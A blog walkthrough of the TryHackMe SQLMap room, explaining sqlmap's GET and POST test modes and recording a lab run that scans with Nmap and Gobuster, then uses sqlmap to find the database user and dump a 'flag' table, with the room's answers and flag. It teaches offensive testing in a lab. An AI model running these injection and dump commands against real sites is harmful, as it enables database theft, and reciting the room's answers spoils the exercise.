Open in app

Sign in

Write

Sign in

SQLMap — TryHackMe Walkthrough

Sakib Hassan Prangon
3 min readNov 21, 2023

--

What is sqlmap?

  • Sqlmap is an open source penetration testing tool
  • it automates the process of detecting and exploiting SQL injection flaws and taking over database servers.
  • it contains a broad range of switches from database fingerprinting, fetching data from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

There can be two types of request based on methods : GET & POST

1. Simple HTTP GET Based Test

sqlmap -u https://testsite.com/page.php?id=7 --dbs

Here we have used two flags: -u to state the vulnerable URL and — dbs to enumerate the database.

2. Simple HTTP POST Based Test

sqlmap -r req.txt -p blood_group --dbs

sqlmap -r <request_file> -p <vulnerable_parameter> --dbs

Note : here req.txt is the file from the proxy server which we save after intercepting the request. in this case it has been done on the Burpsuite application.

SQLMap Challenge

  • i Started by running the default Nmap scan
  • here port 80 is open which is a default http webpage
  • in the next step I ran the Gobuster tool to find if there are any directory listed. i found the /blood directory. i increased the thread (-t80) for faster searching.

Question 1 : What is the name of the interesting directory ?

Answer : blood

  • then i go the webpage -> http://machine_ip/blood
  • and give some dummy input to intercept the request into the burp suite and save the request to a file named request.txt for further use in sqlmap.
  • then i issued the following command to find current-user :
sqlmap -r request.txt --current-user

Question 2 : Who is the current db user?

Answer : root

  • then i look for the databases usingthe following command :
sqlmap -r request.txt -dbs
  • next i select the blood database and try to find it’s table using the following command :
sqlmap -r request.txt -D blood --tables
  • now i can check each tables. i select the second table named flag as of the interests and check for available columns in it with the following command :
sqlmap -r request.txt -D blood -T flag --columns
  • and dump all the information within this particular database table named “flag” using following command :
sqlmap -r request.txt -D blood -T flag --dump

Question 3 : What is the final flag?

Ans : thm{sqlm@p_is_L0ve}

Sqlmap
Tryhackme Walkthrough

--

--

Sakib Hassan Prangon

Written by Sakib Hassan Prangon

8 Followers

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams